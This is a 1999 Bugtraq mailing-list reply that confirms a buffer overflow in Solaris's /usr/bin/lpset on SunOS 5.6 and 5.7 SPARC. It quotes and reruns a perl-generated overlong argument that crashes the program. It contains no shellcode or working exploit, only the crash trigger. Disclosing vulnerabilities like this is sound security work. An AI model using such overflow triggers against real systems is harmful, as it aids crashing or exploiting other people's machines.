Re: SunOS 5.6 (X86) lpset vulnerability

[hso () UEN ORG (Holt Sorenson)]

--y0ulUmNC+osPPQO6
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

On Tue, May 11, 1999 at 11:43:46AM +0900, kim yong-jun homepage=3Dce.hannam=
.ac.kr/~s96192 wrote:
> This is my second post to ButTraq.
> If  this is old, I'm sorry.
> =20
> =20
> It's buffer overflow in "/usr/bin/lpset".
> =20
> View this command :
> [loveyou@/] % /usr/bin/lpset -a key=3D`perl  -e 'print "x" x 1006'` lovey=
ou
> =20
> [loveyou@/] % /usr/bin/lpset -a key=3D`perl  -e 'print "x" x 1007'` lovey=
ou
> Segmentation fault
This is also present on 2.6 sparc and on 2.7 sparc:

Thu May 13 12:11:59
host1 ~ 294 $ uname -a
SunOS host1 5.7 Generic_106541-01 sun4u sparc SUNW,Ultra-1

Thu May 13 12:12:10
host1 ~ 292 $ /usr/bin/lpset -a key=3D`perl  -e 'print "x" x 1011'` alpr
Segmentation Fault

[host2] /home/user 131 > uname -a
SunOS host2 5.6 Generic_105181-13 sun4u sparc SUNW,Ultra-1

[host2] /home/user 131 > /usr/bin/lpset -a  \=20
                           key=3D`perl  -e 'print "x" x 1011'` alpr
Segmentation Fault

--=20

Holt Sorenson
hso () uen org   http://www.uen.org/staff/hso
PGP key id 0x4557CBD3 11/17/97 (DSS/Diffie-Hellman)
PGP key fingerprint "EED8 93AF 9A77 8A7A A7DB 5041 B7E1 47BA 4557 CBD3"

--y0ulUmNC+osPPQO6
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use
MessageID: Pn1JqDCrNx3tW9CNvcQ3UvmckkC4uiBI

iQA/AwUBNzsI7rfhR7pFV8vTEQJmgQCguofjWX3V8tdw0x7xYjdmMWLJ2X0AoONo
Wb4OoKYf2ry8dkVPhRjkuJxw
=pjyt
-----END PGP SIGNATURE-----

--y0ulUmNC+osPPQO6--